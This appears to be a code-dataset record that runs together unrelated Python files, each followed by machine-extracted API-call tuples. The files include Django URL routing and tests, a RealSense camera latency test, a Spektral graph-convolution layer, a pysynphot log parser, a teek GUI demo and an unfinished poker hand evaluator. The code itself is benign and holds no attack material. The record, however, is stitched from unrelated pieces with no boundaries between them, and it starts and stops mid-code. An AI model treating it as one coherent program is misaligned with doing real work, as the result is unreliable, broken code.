sys\n'), ((13381, 13433), 'os.path.exists', 'os.path.exists', (['(dirAssets + density.path + assetName)'], {}), '(dirAssets + density.path + assetName)\n', (13395, 13433), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((6210, 6236), 'os.path.exists', 'os.path.exists', (['densityDir'], {}), '(densityDir)\n', (6224, 6236), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((6609, 6630), 'os.listdir', 'os.listdir', (['dirAssets'], {}), '(dirAssets)\n', (6619, 6630), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((7626, 7651), 'os.path.exists', 'os.path.exists', (['dirAssets'], {}), '(dirAssets)\n', (7640, 7651), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((7731, 7753), 'os.makedirs', 'os.makedirs', (['dirAssets'], {}), '(dirAssets)\n', (7742, 7753), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((10015, 10039), 'pickle.load', 'pickle.load', (['hashStorage'], {}), '(hashStorage)\n', (10026, 10039), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((10675, 10686), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (10683, 10686), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((13447, 13494), 'os.remove', 'os.remove', (['(dirAssets + density.path + assetName)'], {}), '(dirAssets + density.path + assetName)\n', (13456, 13494), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((3435, 3462), 'multiprocessing.cpu_count', 'multiprocessing.cpu_count', ([], {}), '()\n', (3460, 3462), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((6446, 6471), 'shutil.rmtree', 'shutil.rmtree', (['densityDir'], {}), '(densityDir)\n', (6459, 6471), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((6507, 6527), 'os.rmdir', 'os.rmdir', (['densityDir'], {}), '(densityDir)\n', (6515, 6527), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((7366, 7406), 'os.path.exists', 'os.path.exists', (['(dirAssets + density.path)'], {}), '(dirAssets + density.path)\n', (7380, 7406), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((7514, 7551), 'os.makedirs', 'os.makedirs', (['(dirAssets + density.path)'], {}), '(dirAssets + density.path)\n', (7525, 7551), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((6242, 6264), 'os.listdir', 'os.listdir', (['densityDir'], {}), '(densityDir)\n', (6252, 6264), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((11583, 11613), 'os.path.basename', 'os.path.basename', (['rawAssetPath'], {}), '(rawAssetPath)\n', (11599, 11613), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((10242, 10264), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\n', (10258, 10264), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n')] |
import os
from djangular import utils
from django.test import SimpleTestCase
class SiteAndPathUtilsTest(SimpleTestCase):
site_utils = utils.SiteAndPathUtils()
def test_djangular_root(self):
current_dir = os.path.dirname(os.path.abspath(__file__))
djangular_dir = os.path.dirname(current_dir)
self.assertEqual(djangular_dir, self.site_utils.get_djangular_root())
| [
"os.path.abspath",
"os.path.dirname",
"djangular.utils.SiteAndPathUtils"
] | [((142, 166), 'djangular.utils.SiteAndPathUtils', 'utils.SiteAndPathUtils', ([], {}), '()\n', (164, 166), False, 'from djangular import utils\n'), ((292, 320), 'os.path.dirname', 'os.path.dirname', (['current_dir'], {}), '(current_dir)\n', (307, 320), False, 'import os\n'), ((241, 266), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (256, 266), False, 'import os\n')] |
from django.conf.urls import patterns, include, url
from django.contrib import admin
from django.conf.urls.static import static
from userModule.views import home
from userModule.views import userSettings
from userModule.views import logout
from groupModule.views import createGroup
from groupModule.views import group
from groupModule.views import selectgroup
from groupModule.views import groupSettings
from wee.views import *
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
import settings
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'wee.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^admin/', include(admin.site.urls)),
url(r'^home/$', home),
url(r'^newsfeed/$', newsfeed),
url(r'^logout/$', logout),
url(r'^post/$', newPost),
url(r'^newgroup/$', createGroup),
url(r'^settings/$', userSettings),
url(r'^group/(?P<groupId>\d+)/$', group),
url(r'^groups/$' , selectgroup),
url(r'^group/(?P<groupId>\d+)/settings/$', groupSettings),
url(r'^friends/$' , friends) ,
url(r'^timeline/(?P<profileUserId>\d+)/(?P<change>\w)/friend/$', updateFriend),
url(r'^timeline/(?P<profileUserId>\d+)/follow/$', updateFollow),
url(r'^timeline/(?P<profileUserId>\d+)/$', timeline),
url(r'^search/$', search),
url(r'^like/(?P<postId>\d+)/$', like),
url(r'^getlike/(?P<postId>\d+)/$', getLike),
url(r'^comment/(?P<postId>\d+)/$', comment),
url(r'^getcomment/(?P<postId>\d+)/$', getComment),
url(r'^share/(?P<postId>\d+)/$', share),
url(r'^getshare/(?P<postId>\d+)/$', getShare),
)
urlpatterns += staticfiles_urlpatterns()
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
urlpatterns += patterns('', url(r'^.*/$', notfound), )
| [
"django.conf.urls.static.static",
"django.conf.urls.include",
"django.contrib.staticfiles.urls.staticfiles_urlpatterns",
"django.conf.urls.url"
] | [((1632, 1657), 'django.contrib.staticfiles.urls.staticfiles_urlpatterns', 'staticfiles_urlpatterns', ([], {}), '()\n', (1655, 1657), False, 'from django.contrib.staticfiles.urls import staticfiles_urlpatterns\n'), ((1673, 1734), 'django.conf.urls.static.static', 'static', (['settings.MEDIA_URL'], {'document_root': 'settings.MEDIA_ROOT'}), '(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n', (1679, 1734), False, 'from django.conf.urls.static import static\n'), ((702, 722), 'django.conf.urls.url', 'url', (['"""^home/$"""', 'home'], {}), "('^home/$', home)\n", (705, 722), False, 'from django.conf.urls import patterns, include, url\n'), ((729, 757), 'django.conf.urls.url', 'url', (['"""^newsfeed/$"""', 'newsfeed'], {}), "('^newsfeed/$', newsfeed)\n", (732, 757), False, 'from django.conf.urls import patterns, include, url\n'), ((764, 788), 'django.conf.urls.url', 'url', (['"""^logout/$"""', 'logout'], {}), "('^logout/$', logout)\n", (767, 788), False, 'from django.conf.urls import patterns, include, url\n'), ((795, 818), 'django.conf.urls.url', 'url', (['"""^post/$"""', 'newPost'], {}), "('^post/$', newPost)\n", (798, 818), False, 'from django.conf.urls import patterns, include, url\n'), ((825, 856), 'django.conf.urls.url', 'url', (['"""^newgroup/$"""', 'createGroup'], {}), "('^newgroup/$', createGroup)\n", (828, 856), False, 'from django.conf.urls import patterns, include, url\n'), ((863, 895), 'django.conf.urls.url', 'url', (['"""^settings/$"""', 'userSettings'], {}), "('^settings/$', userSettings)\n", (866, 895), False, 'from django.conf.urls import patterns, include, url\n'), ((902, 942), 'django.conf.urls.url', 'url', (['"""^group/(?P<groupId>\\\\d+)/$"""', 'group'], {}), "('^group/(?P<groupId>\\\\d+)/$', group)\n", (905, 942), False, 'from django.conf.urls import patterns, include, url\n'), ((948, 977), 'django.conf.urls.url', 'url', (['"""^groups/$"""', 'selectgroup'], {}), "('^groups/$', selectgroup)\n", (951, 977), False, 'from django.conf.urls import patterns, include, url\n'), ((985, 1042), 'django.conf.urls.url', 'url', (['"""^group/(?P<groupId>\\\\d+)/settings/$"""', 'groupSettings'], {}), "('^group/(?P<groupId>\\\\d+)/settings/$', groupSettings)\n", (988, 1042), False, 'from django.conf.urls import patterns, include, url\n'), ((1048, 1074), 'django.conf.urls.url', 'url', (['"""^friends/$"""', 'friends'], {}), "('^friends/$', friends)\n", (1051, 1074), False, 'from django.conf.urls import patterns, include, url\n'), ((1083, 1162), 'django.conf.urls.url', 'url', (['"""^timeline/(?P<profileUserId>\\\\d+)/(?P<change>\\\\w)/friend/$"""', 'updateFriend'], {}), "('^timeline/(?P<profileUserId>\\\\d+)/(?P<change>\\\\w)/friend/$', updateFriend)\n", (1086, 1162), False, 'from django.conf.urls import patterns, include, url\n'), ((1167, 1230), 'django.conf.urls.url', 'url', (['"""^timeline/(?P<profileUserId>\\\\d+)/follow/$"""', 'updateFollow'], {}), "('^timeline/(?P<profileUserId>\\\\d+)/follow/$', updateFollow)\n", (1170, 1230), False, 'from django.conf.urls import patterns, include, url\n'), ((1236, 1288), 'django.conf.urls.url', 'url', (['"""^timeline/(?P<profileUserId>\\\\d+)/$"""', 'timeline'], {}), "('^timeline/(?P<profileUserId>\\\\d+)/$', timeline)\n", (1239, 1288), False, 'from django.conf.urls import patterns, include, url\n'), ((1294, 1318), 'django.conf.urls.url', 'url', (['"""^search/$"""', 'search'], {}), "('^search/$', search)\n", (1297, 1318), False, 'from django.conf.urls import patterns, include, url\n'), ((1325, 1362), 'django.conf.urls.url', 'url', (['"""^like/(?P<postId>\\\\d+)/$"""', 'like'], {}), "('^like/(?P<postId>\\\\d+)/$', like)\n", (1328, 1362), False, 'from django.conf.urls import patterns, include, url\n'), ((1368, 1411), 'django.conf.urls.url', 'url', (['"""^getlike/(?P<postId>\\\\d+)/$"""', 'getLike'], {}), "('^getlike/(?P<postId>\\\\d+)/$', getLike)\n", (1371, 1411), False, 'from django.conf.urls import patterns, include, url\n'), ((1417, 1460), 'django.conf.urls.url', 'url', (['"""^comment/(?P<postId>\\\\d+)/$"""', 'comment'], {}), "('^comment/(?P<postId>\\\\d+)/$', comment)\n", (1420, 1460), False, 'from django.conf.urls import patterns, include, url\n'), ((1466, 1515), 'django.conf.urls.url', 'url', (['"""^getcomment/(?P<postId>\\\\d+)/$"""', 'getComment'], {}), "('^getcomment/(?P<postId>\\\\d+)/$', getComment)\n", (1469, 1515), False, 'from django.conf.urls import patterns, include, url\n'), ((1521, 1560), 'django.conf.urls.url', 'url', (['"""^share/(?P<postId>\\\\d+)/$"""', 'share'], {}), "('^share/(?P<postId>\\\\d+)/$', share)\n", (1524, 1560), False, 'from django.conf.urls import patterns, include, url\n'), ((1566, 1611), 'django.conf.urls.url', 'url', (['"""^getshare/(?P<postId>\\\\d+)/$"""', 'getShare'], {}), "('^getshare/(?P<postId>\\\\d+)/$', getShare)\n", (1569, 1611), False, 'from django.conf.urls import patterns, include, url\n'), ((1763, 1785), 'django.conf.urls.url', 'url', (['"""^.*/$"""', 'notfound'], {}), "('^.*/$', notfound)\n", (1766, 1785), False, 'from django.conf.urls import patterns, include, url\n'), ((671, 695), 'django.conf.urls.include', 'include', (['admin.site.urls'], {}), '(admin.site.urls)\n', (678, 695), False, 'from django.conf.urls import patterns, include, url\n')] |
# License: Apache 2.0. See LICENSE file in root directory.
# Copyright(c) 2021 Intel Corporation. All Rights Reserved.
# test:device L500*
# test:device D400*
import pyrealsense2 as rs
from rspy.stopwatch import Stopwatch
from rspy import test, log
import time
import platform
# Start depth + color streams and measure the time from stream opened until first frame arrived using sensor API.
# Verify that the time do not exceeds the maximum time allowed
# Note - Using Windows Media Foundation to handle power management between USB actions take time (~27 ms)
def time_to_first_frame(sensor, profile, max_delay_allowed):
"""
Wait for the first frame for 'max_delay_allowed' + 1 extra second
If the frame arrives it will return the seconds it took since open() call
If no frame it will return 'max_delay_allowed'
"""
first_frame_time = max_delay_allowed
open_call_stopwatch = Stopwatch()
def frame_cb(frame):
nonlocal first_frame_time, open_call_stopwatch
if first_frame_time == max_delay_allowed:
first_frame_time = open_call_stopwatch.get_elapsed()
open_call_stopwatch.reset()
sensor.open(profile)
sensor.start(frame_cb)
# Wait condition:
# 1. first frame did not arrive yet
# 2. timeout of 'max_delay_allowed' + 1 extra second reached.
while first_frame_time == max_delay_allowed and open_call_stopwatch.get_elapsed() < max_delay_allowed + 1:
time.sleep(0.05)
sensor.stop()
sensor.close()
return first_frame_time
# The device starts at D0 (Operational) state, allow time for it to get into idle state
time.sleep(3)
#####################################################################################################
test.start("Testing device creation time on " + platform.system() + " OS")
device_creation_stopwatch = Stopwatch()
dev = test.find_first_device_or_exit()
device_creation_time = device_creation_stopwatch.get_elapsed()
max_time_for_device_creation = 1.5
print("Device creation time is: {:.3f} [sec] max allowed is: {:.1f} [sec] ".format(device_creation_time, max_time_for_device_creation))
test.check(device_creation_time < max_time_for_device_creation)
test.finish()
# Set maximum delay for first frame according to product line
product_line = dev.get_info(rs.camera_info.product_line)
if product_line == "D400":
max_delay_for_depth_frame = 1.5
max_delay_for_color_frame = 1.5
elif product_line == "L500":
max_delay_for_depth_frame = 2.5 # L515 depth frame has a 1.5 seconds built in delay at the FW side + 1.0 second for LRS
max_delay_for_color_frame = 1.5
else:
log.f( "This test support only D400 + L515 devices" )
ds = dev.first_depth_sensor()
cs = dev.first_color_sensor()
dp = next(p for p in
ds.profiles if p.fps() == 30
and p.stream_type() == rs.stream.depth
and p.format() == rs.format.z16)
cp = next(p for p in
cs.profiles if p.fps() == 30
and p.stream_type() == rs.stream.color
and p.format() == rs.format.rgb8)
#####################################################################################################
test.start("Testing first depth frame delay on " + product_line + " device - "+ platform.system() + " OS")
first_depth_frame_delay = time_to_first_frame(ds, dp, max_delay_for_depth_frame)
print("Time until first depth frame is: {:.3f} [sec] max allowed is: {:.1f} [sec] ".format(first_depth_frame_delay, max_delay_for_depth_frame))
test.check(first_depth_frame_delay < max_delay_for_depth_frame)
test.finish()
#####################################################################################################
test.start("Testing first color frame delay on " + product_line + " device - "+ platform.system() + " OS")
first_color_frame_delay = time_to_first_frame(cs, cp, max_delay_for_color_frame)
print("Time until first color frame is: {:.3f} [sec] max allowed is: {:.1f} [sec] ".format(first_color_frame_delay, max_delay_for_color_frame))
test.check(first_color_frame_delay < max_delay_for_color_frame)
test.finish()
#####################################################################################################
test.print_results_and_exit()
| [
"rspy.test.finish",
"rspy.log.f",
"rspy.stopwatch.Stopwatch",
"rspy.test.check",
"rspy.test.print_results_and_exit",
"time.sleep",
"platform.system",
"rspy.test.find_first_device_or_exit"
] | [((1623, 1636), 'time.sleep', 'time.sleep', (['(3)'], {}), '(3)\n', (1633, 1636), False, 'import time\n'), ((1844, 1855), 'rspy.stopwatch.Stopwatch', 'Stopwatch', ([], {}), '()\n', (1853, 1855), False, 'from rspy.stopwatch import Stopwatch\n'), ((1862, 1894), 'rspy.test.find_first_device_or_exit', 'test.find_first_device_or_exit', ([], {}), '()\n', (1892, 1894), False, 'from rspy import test, log\n'), ((2129, 2192), 'rspy.test.check', 'test.check', (['(device_creation_time < max_time_for_device_creation)'], {}), '(device_creation_time < max_time_for_device_creation)\n', (2139, 2192), False, 'from rspy import test, log\n'), ((2193, 2206), 'rspy.test.finish', 'test.finish', ([], {}), '()\n', (2204, 2206), False, 'from rspy import test, log\n'), ((3489, 3552), 'rspy.test.check', 'test.check', (['(first_depth_frame_delay < max_delay_for_depth_frame)'], {}), '(first_depth_frame_delay < max_delay_for_depth_frame)\n', (3499, 3552), False, 'from rspy import test, log\n'), ((3553, 3566), 'rspy.test.finish', 'test.finish', ([], {}), '()\n', (3564, 3566), False, 'from rspy import test, log\n'), ((4003, 4066), 'rspy.test.check', 'test.check', (['(first_color_frame_delay < max_delay_for_color_frame)'], {}), '(first_color_frame_delay < max_delay_for_color_frame)\n', (4013, 4066), False, 'from rspy import test, log\n'), ((4067, 4080), 'rspy.test.finish', 'test.finish', ([], {}), '()\n', (4078, 4080), False, 'from rspy import test, log\n'), ((4185, 4214), 'rspy.test.print_results_and_exit', 'test.print_results_and_exit', ([], {}), '()\n', (4212, 4214), False, 'from rspy import test, log\n'), ((908, 919), 'rspy.stopwatch.Stopwatch', 'Stopwatch', ([], {}), '()\n', (917, 919), False, 'from rspy.stopwatch import Stopwatch\n'), ((1449, 1465), 'time.sleep', 'time.sleep', (['(0.05)'], {}), '(0.05)\n', (1459, 1465), False, 'import time\n'), ((2626, 2677), 'rspy.log.f', 'log.f', (['"""This test support only D400 + L515 devices"""'], {}), "('This test support only D400 + L515 devices')\n", (2631, 2677), False, 'from rspy import test, log\n'), ((1789, 1806), 'platform.system', 'platform.system', ([], {}), '()\n', (1804, 1806), False, 'import platform\n'), ((3237, 3254), 'platform.system', 'platform.system', ([], {}), '()\n', (3252, 3254), False, 'import platform\n'), ((3751, 3768), 'platform.system', 'platform.system', ([], {}), '()\n', (3766, 3768), False, 'import platform\n')] |
from tensorflow.keras import activations, initializers, regularizers, constraints
from tensorflow.keras import backend as K
from tensorflow.keras.layers import Layer
from spektral.layers import ops
from spektral.utils import localpooling_filter
class GraphConv(Layer):
r"""
A graph convolutional layer (GCN) as presented by
[<NAME> (2016)](https://arxiv.org/abs/1609.02907).
**Mode**: single, disjoint, mixed, batch.
This layer computes:
$$
\Z = \hat \D^{-1/2} \hat \A \hat \D^{-1/2} \X \W + \b
$$
where \( \hat \A = \A + \I \) is the adjacency matrix with added self-loops
and \(\hat\D\) is its degree matrix.
**Input**
- Node features of shape `([batch], N, F)`;
- Modified Laplacian of shape `([batch], N, N)`; can be computed with
`spektral.utils.convolution.localpooling_filter`.
**Output**
- Node features with the same shape as the input, but with the last
dimension changed to `channels`.
**Arguments**
- `channels`: number of output channels;
- `activation`: activation function to use;
- `use_bias`: bool, add a bias vector to the output;
- `kernel_initializer`: initializer for the weights;
- `bias_initializer`: initializer for the bias vector;
- `kernel_regularizer`: regularization applied to the weights;
- `bias_regularizer`: regularization applied to the bias vector;
- `activity_regularizer`: regularization applied to the output;
- `kernel_constraint`: constraint applied to the weights;
- `bias_constraint`: constraint applied to the bias vector.
"""
def __init__(self,
channels,
activation=None,
use_bias=True,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
**kwargs):
super().__init__(activity_regularizer=activity_regularizer, **kwargs)
self.channels = channels
self.activation = activations.get(activation)
self.use_bias = use_bias
self.kernel_initializer = initializers.get(kernel_initializer)
self.bias_initializer = initializers.get(bias_initializer)
self.kernel_regularizer = regularizers.get(kernel_regularizer)
self.bias_regularizer = regularizers.get(bias_regularizer)
self.kernel_constraint = constraints.get(kernel_constraint)
self.bias_constraint = constraints.get(bias_constraint)
self.supports_masking = False
def build(self, input_shape):
assert len(input_shape) >= 2
input_dim = input_shape[0][-1]
self.kernel = self.add_weight(shape=(input_dim, self.channels),
initializer=self.kernel_initializer,
name='kernel',
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint)
if self.use_bias:
self.bias = self.add_weight(shape=(self.channels,),
initializer=self.bias_initializer,
name='bias',
regularizer=self.bias_regularizer,
constraint=self.bias_constraint)
else:
self.bias = None
self.built = True
def call(self, inputs):
features = inputs[0]
fltr = inputs[1]
# Convolution
output = ops.dot(features, self.kernel)
output = ops.filter_dot(fltr, output)
if self.use_bias:
output = K.bias_add(output, self.bias)
if self.activation is not None:
output = self.activation(output)
return output
def compute_output_shape(self, input_shape):
features_shape = input_shape[0]
output_shape = features_shape[:-1] + (self.channels,)
return output_shape
def get_config(self):
config = {
'channels': self.channels,
'activation': activations.serialize(self.activation),
'use_bias': self.use_bias,
'kernel_initializer': initializers.serialize(self.kernel_initializer),
'bias_initializer': initializers.serialize(self.bias_initializer),
'kernel_regularizer': regularizers.serialize(self.kernel_regularizer),
'bias_regularizer': regularizers.serialize(self.bias_regularizer),
'kernel_constraint': constraints.serialize(self.kernel_constraint),
'bias_constraint': constraints.serialize(self.bias_constraint)
}
base_config = super().get_config()
return dict(list(base_config.items()) + list(config.items()))
@staticmethod
def preprocess(A):
return localpooling_filter(A) | [
"tensorflow.keras.constraints.get",
"tensorflow.keras.regularizers.serialize",
"tensorflow.keras.activations.get",
"spektral.layers.ops.filter_dot",
"tensorflow.keras.initializers.serialize",
"tensorflow.keras.backend.bias_add",
"spektral.utils.localpooling_filter",
"spektral.layers.ops.dot",
"tenso... | [((2188, 2215), 'tensorflow.keras.activations.get', 'activations.get', (['activation'], {}), '(activation)\n', (2203, 2215), False, 'from tensorflow.keras import activations, initializers, regularizers, constraints\n'), ((2283, 2319), 'tensorflow.keras.initializers.get', 'initializers.get', (['kernel_initializer'], {}), '(kernel_initializer)\n', (2299, 2319), False, 'from tensorflow.keras import activations, initializers, regularizers, constraints\n'), ((2352, 2386), 'tensorflow.keras.initializers.get', 'initializers.get', (['bias_initializer'], {}), '(bias_initializer)\n', (2368, 2386), False, 'from tensorflow.keras import activations, initializers, regularizers, constraints\n'), ((2421, 2457), 'tensorflow.keras.regularizers.get', 'regularizers.get', (['kernel_regularizer'], {}), '(kernel_regularizer)\n', (2437, 2457), False, 'from tensorflow.keras import activations, initializers, regularizers, constraints\n'), ((2490, 2524), 'tensorflow.keras.regularizers.get', 'regularizers.get', (['bias_regularizer'], {}), '(bias_regularizer)\n', (2506, 2524), False, 'from tensorflow.keras import activations, initializers, regularizers, constraints\n'), ((2558, 2592), 'tensorflow.keras.constraints.get', 'constraints.get', (['kernel_constraint'], {}), '(kernel_constraint)\n', (2573, 2592), False, 'from tensorflow.keras import activations, initializers, regularizers, constraints\n'), ((2624, 2656), 'tensorflow.keras.constraints.get', 'constraints.get', (['bias_constraint'], {}), '(bias_constraint)\n', (2639, 2656), False, 'from tensorflow.keras import activations, initializers, regularizers, constraints\n'), ((3712, 3742), 'spektral.layers.ops.dot', 'ops.dot', (['features', 'self.kernel'], {}), '(features, self.kernel)\n', (3719, 3742), False, 'from spektral.layers import ops\n'), ((3760, 3788), 'spektral.layers.ops.filter_dot', 'ops.filter_dot', (['fltr', 'output'], {}), '(fltr, output)\n', (3774, 3788), False, 'from spektral.layers import ops\n'), ((5003, 5025), 'spektral.utils.localpooling_filter', 'localpooling_filter', (['A'], {}), '(A)\n', (5022, 5025), False, 'from spektral.utils import localpooling_filter\n'), ((3837, 3866), 'tensorflow.keras.backend.bias_add', 'K.bias_add', (['output', 'self.bias'], {}), '(output, self.bias)\n', (3847, 3866), True, 'from tensorflow.keras import backend as K\n'), ((4265, 4303), 'tensorflow.keras.activations.serialize', 'activations.serialize', (['self.activation'], {}), '(self.activation)\n', (4286, 4303), False, 'from tensorflow.keras import activations, initializers, regularizers, constraints\n'), ((4378, 4425), 'tensorflow.keras.initializers.serialize', 'initializers.serialize', (['self.kernel_initializer'], {}), '(self.kernel_initializer)\n', (4400, 4425), False, 'from tensorflow.keras import activations, initializers, regularizers, constraints\n'), ((4459, 4504), 'tensorflow.keras.initializers.serialize', 'initializers.serialize', (['self.bias_initializer'], {}), '(self.bias_initializer)\n', (4481, 4504), False, 'from tensorflow.keras import activations, initializers, regularizers, constraints\n'), ((4540, 4587), 'tensorflow.keras.regularizers.serialize', 'regularizers.serialize', (['self.kernel_regularizer'], {}), '(self.kernel_regularizer)\n', (4562, 4587), False, 'from tensorflow.keras import activations, initializers, regularizers, constraints\n'), ((4621, 4666), 'tensorflow.keras.regularizers.serialize', 'regularizers.serialize', (['self.bias_regularizer'], {}), '(self.bias_regularizer)\n', (4643, 4666), False, 'from tensorflow.keras import activations, initializers, regularizers, constraints\n'), ((4701, 4746), 'tensorflow.keras.constraints.serialize', 'constraints.serialize', (['self.kernel_constraint'], {}), '(self.kernel_constraint)\n', (4722, 4746), False, 'from tensorflow.keras import activations, initializers, regularizers, constraints\n'), ((4779, 4822), 'tensorflow.keras.constraints.serialize', 'constraints.serialize', (['self.bias_constraint'], {}), '(self.bias_constraint)\n', (4800, 4822), False, 'from tensorflow.keras import activations, initializers, regularizers, constraints\n')] |
from django.contrib import admin
from .models import Device,Metric
class DeviceAdmin(admin.ModelAdmin):
list_display = ["name", "token","user", "created_date"]
search_fields = ["name", "token"]
list_filter = ("user",)
class MetricAdmin(admin.ModelAdmin):
list_display = ["device","temperature", "humidity", "created_date"]
search_fields = ["device"]
list_filter = ("device",)
admin.site.register(Device, DeviceAdmin)
admin.site.register(Metric, MetricAdmin)
| [
"django.contrib.admin.site.register"
] | [((404, 444), 'django.contrib.admin.site.register', 'admin.site.register', (['Device', 'DeviceAdmin'], {}), '(Device, DeviceAdmin)\n', (423, 444), False, 'from django.contrib import admin\n'), ((445, 485), 'django.contrib.admin.site.register', 'admin.site.register', (['Metric', 'MetricAdmin'], {}), '(Metric, MetricAdmin)\n', (464, 485), False, 'from django.contrib import admin\n')] |
from django.urls import reverse
from pytest import mark
from core.models import *
urls = [reverse(name) for name in ["core:index", "core:arts"]]
@mark.parametrize("url", urls)
@mark.django_db
def test_nsfw_filter(url, django_user_model, client):
target = django_user_model.objects.create(username="bob", password="<PASSWORD>")
follower = django_user_model.objects.create(username="alice", password="<PASSWORD>")
follower.following.add(target)
sfw = Art(id=1, artist=target, title="sfw", text="sfw", nsfw=False)
nsfw = Art(id=2, artist=target, title="nsfw", text="nsfw", nsfw=True)
sfw.save()
nsfw.save()
client.force_login(follower)
response = client.get(url)
assert sfw in response.context["arts"]
assert nsfw in response.context["arts"]
follower.nsfw_pref = "HA"
follower.save()
response = client.get(url)
assert sfw in response.context["arts"]
assert nsfw not in response.context["arts"]
| [
"pytest.mark.parametrize",
"django.urls.reverse"
] | [((150, 179), 'pytest.mark.parametrize', 'mark.parametrize', (['"""url"""', 'urls'], {}), "('url', urls)\n", (166, 179), False, 'from pytest import mark\n'), ((92, 105), 'django.urls.reverse', 'reverse', (['name'], {}), '(name)\n', (99, 105), False, 'from django.urls import reverse\n')] |
"""This script *replaces* the processlog.csh shell script. It has
more sophisticated logic to add the etc test name to the pysynphot
command as another keyword-value pair.
Modified to parse the modified line, then write a dictionary that will
be read by the gencases tool.
"""
import sys,re, pickle
from pysynphot import etc
import gencases
def run(fname):
log=open(fname)
out=open(fname.replace('.txt','_lookup.pickle'),'w')
d={}
line='unopened'
while len(line)>0:
line = log.readline().strip()
if "] starting" in line or "] running" in line:
x=re.search("'(?P<name>.*)'",line)
testname=x.group('name')
elif 'command is' in line:
prefix,value=line.lstrip().split('command is')
cmd='%s&etcid="%s"\n'%(value[0:-2],
testname)
#Entry in the new dictionary
ktuple=gencases.line2ktuple(cmd)
try:
d[ktuple].append(testname)
except KeyError:
d[ktuple]=[testname]
log.close()
#Save the resulting library
pickle.dump(d,out)
out.close()
if __name__ == '__main__':
run(sys.argv[1])
| [
"gencases.line2ktuple",
"pickle.dump",
"re.search"
] | [((1136, 1155), 'pickle.dump', 'pickle.dump', (['d', 'out'], {}), '(d, out)\n', (1147, 1155), False, 'import sys, re, pickle\n'), ((598, 631), 're.search', 're.search', (['"""\'(?P<name>.*)\'"""', 'line'], {}), '("\'(?P<name>.*)\'", line)\n', (607, 631), False, 'import sys, re, pickle\n'), ((915, 940), 'gencases.line2ktuple', 'gencases.line2ktuple', (['cmd'], {}), '(cmd)\n', (935, 940), False, 'import gencases\n')] |
import teek
def on_click():
print("You clicked me!")
window = teek.Window()
button = teek.Button(window, "Click me", command=on_click)
button.pack()
window.on_delete_window.connect(teek.quit)
teek.run()
| [
"teek.run",
"teek.Window",
"teek.Button"
] | [((70, 83), 'teek.Window', 'teek.Window', ([], {}), '()\n', (81, 83), False, 'import teek\n'), ((93, 142), 'teek.Button', 'teek.Button', (['window', '"""Click me"""'], {'command': 'on_click'}), "(window, 'Click me', command=on_click)\n", (104, 142), False, 'import teek\n'), ((200, 210), 'teek.run', 'teek.run', ([], {}), '()\n', (208, 210), False, 'import teek\n')] |
# -*- coding: utf-8 -*-
"""
Created on Wed Dec 4 13:54:27 2019
@author: eric.qian
"""
from collections import Counter
from itertools import combinations
# Numeric hand rankings, higher integer value is stronger hand
HAND_RANKINGS = {0: 'High Card',
1: 'One Pair',
2: 'Two Pair',
3: 'Trips',
4: 'Straight',
5: 'Flush',
6: 'Full House',
7: 'Quads',
8: 'Straight Flush'}
# Card values mapped to integer strengths, higher integer value stronger
CARD_VALS = {'2':1,
'3':2,
'4':3,
'5':4,
'6':5,
'7':6,
'8':7,
'9':8,
'10':9,
'J':10,
'Q':11,
'K':12,
'A':13}
# Cache mapper
REVERSE_VALS = {v:k for k,v in CARD_VALS.items()}
def check_flush(suits):
# If count of suits equals length of hand
if suits.count(suits[0]) == len(suits):
return True
def check_strt(card_vals):
# Edge case of A,2,3,4,5 straight
if sorted(card_vals) == [1,2,3,4,13]:
return True
# If sorted(hand) - min evaluates to 0,1,2,3,4
if [i - min(card_vals) for i in sorted(card_vals)] == [0,1,2,3,4]:
return True
def read_hand(hand):
"""
hand :: list of str :: unordered str hand value representation, i.e. ['As','As','2h','2s','Ks']
=========
returns
hand_strength :: list of int :: sequential integer representation of hand strs,
[HAND_RANKINGS, HIGH_CARD_1, HIGH_CARD_2, HIGH_CARD_3, HIGH_CARD_4] in descending strength priority
For example, if we have Two pairs Aces and 2s w/ K high:
[2,13,1,12] -> [Two Pair int val, Ace int val, 2 int val, K int val]
desc :: str :: full description of hand
"""
# Initialize ranking and descriptiong
ranking = 0
desc = ''
# Split card vals and suits. 10 is edge case
suits = [i[1] if '10' not in i else i[2] for i in hand]
card_vals = [CARD_VALS[i[0]] if '10' not in i else CARD_VALS['10'] for i in hand]
# Unique card counts, hands are easily evaluated with dict of count of cards
card_counter = Counter(card_vals)
# Straight flush ranking
if check_flush(suits) and check_strt(card_vals):
ranking = 8
# Flush ranking
elif check_flush(suits):
ranking = 5
# Straight ranking
elif check_strt(card_vals):
ranking = 4
# If there are only 2 unique cards, must be quads or full house
